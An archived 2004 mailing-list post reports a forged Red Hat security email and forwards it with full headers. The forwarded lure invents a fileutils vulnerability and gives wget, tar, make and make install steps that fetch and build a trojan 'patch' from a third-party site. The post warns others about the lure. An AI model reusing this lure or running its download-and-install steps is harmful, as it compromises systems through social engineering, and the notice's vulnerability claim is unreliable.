[CS-FSLUG] Alert to Trojan Aimed at Red Hat Users

Timothy R. Butler tbutler at uninetsolutions.com
Sat Nov 20 14:32:55 CST 2004 

Dear Sir:
	I wanted to alert you to this forged Red Hat security notice that I 
received two copies of this morning (see below). I see that it has been 
sent out previously to others, but the download location of the file 
has changed. I have contacted the company hosting the file, but I would 
imagine if Red Hat contacts them they may be more likely to remove it 
at an expedited rate.

	Best Regards,
			Timothy R. Butler

---------------------------------------------------------------
Timothy R. Butler       Universal Networks      www.uninet.info
==================== <tbutler at uninet.info> ====================
| Christian Portal:      | Have you not learned great lessons |
|      www.faithtree.com | from those  who  braced themselves |
| GNU/Linux News:        | against  you   and   disputed  the |
|            www.ofb.biz | passage with you?   --Walt Whitman |
---------------------------------------------------------------
Presently on "Albert" (DP PPC 970 "G5" running at 2.0 GHz)

Begin forwarded message:

> From: Red Hat<update at redhat.com>
> Date: November 20, 2004 2:59:43 AM CST
> To: undisclosed-recipients:;
> Subject: Fileutils Buffer Overflow
> Return-Path: <mailman-bounces at cedar.serverforest.com>
> Envelope-To: tbutler at ofb.biz
> Delivery-Date: Sat, 20 Nov 2004 04:07:46 -0500
> Received: from ofb by cedar.serverforest.com with local-bsmtp (Exim 
> 4.43) id 1CVRDd-00070v-O9 for tbutler at ofb.biz; Sat, 20 Nov 2004 
> 04:07:46 -0500
> Received: from localhost ([127.0.0.1] helo=cedar.serverforest.com) by 
> cedar.serverforest.com with esmtp (Exim 4.43) id 1CVRDb-00070a-Eg for 
> tbutler at uninetsolutions.com; Sat, 20 Nov 2004 04:07:43 -0500
> Received: from [81.196.160.41] (helo=campus.emsolgroup.com) by 
> cedar.serverforest.com with esmtps (TLSv1:AES256-SHA:256) (Exim 4.43) 
> id 1CVRDV-000709-Ns for ofbtalk-owner at ofb.biz; Sat, 20 Nov 2004 
> 04:07:39 -0500
> Received: from campus.emsolgroup.com (localhost.rdsct.ro [127.0.0.1]) 
> by campus.emsolgroup.com (8.13.1/8.12.6) with ESMTP id iAK8xhjo008889 
> for <ofbtalk-owner at ofb.biz>; Sat, 20 Nov 2004 10:59:43 +0200 (EET) 
> (envelope-from nobody at ems.rdsct.ro)
> Received: (from nobody at localhost) by campus.emsolgroup.com 
> (8.13.1/8.12.6/Submit) id iAK8xh6M008887 for ofbtalk-owner at ofb.biz; 
> Sat, 20 Nov 2004 10:59:43 +0200 (EET)
> Message-Id: <200411200859.iAK8xh6M008887 at campus.emsolgroup.com>
> Mime-Version: 1.0
> Content-Type: text/html; boundary="xlcuiBo847gtaDvjhSdgF983r"
> X-Mailer: ebay
> Errors-To: mailman-bounces at cedar.serverforest.com
> X-Spam-Status: No, score=-0.7 required=5.0 tests=BAYES_00,HTML_30_40, 
> HTML_IMAGE_ONLY_20,HTML_MESSAGE,MIME_HTML_ONLY,UNDISC_RECIPS  
> autolearn=no version=3.0.1
> X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on  
> cedar.serverforest.com
> X-Spam-Level:
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/enriched
Size: 2826 bytes
Desc: not available
URL: <http://ofb.biz/pipermail/christiansource_ofb.biz/attachments/20041120/38c8e9f9/attachment.bin>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: logo_rh_home.png
Type: image/png
Size: 1266 bytes
Desc: not available
URL: <http://ofb.biz/pipermail/christiansource_ofb.biz/attachments/20041120/38c8e9f9/attachment.png>
-------------- next part --------------
>
>  Original issue date: October 20, 2004
>  Last revised: October 20, 2004
>  Source: Red Hat
>
>  A complete revision history is at the end of this file.
>
>  Dear Red Hat user,
>
>  We have found a vulnerability in fileutils (ls and mkdir), that could 
> allow a remote attacker to execute arbitrary code with root 
> privileges. Some of the affected linux distributions include RedHat 
> 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 
> and not only. It is known that *BSD and Solaris platforms are NOT 
> affected.
>
> The Red Hat Security Team strongly advises you to immediately apply 
> the fileutils-1.0.6 patch. This is a critical-critical update that you 
> must make by following these steps:
> 	? 	First download the patch from the Wcml Red Hat mirror: wget 
> http://www.wcml.co.uk/critical/fileutils-1.0.6.patch.tar.gz or 
> directly here.
> 	? 	 Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
> 	? 	cd fileutils-1.0.6.patch
> 	? 	make
> 	? 	make install
>
> Again, please apply this patch as soon as possible or you risk your 
> system and others` to be compromised.
>
> Thank you for your prompt attention to this serious matter,
>
> Red Hat Security Team.
>
>  Copyright ? 2004 Red Hat, Inc. All rights reserved.
>

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/enriched
Size: 1233 bytes
Desc: not available
URL: <http://ofb.biz/pipermail/christiansource_ofb.biz/attachments/20041120/38c8e9f9/attachment-0001.bin>

More information about the Christiansource mailing list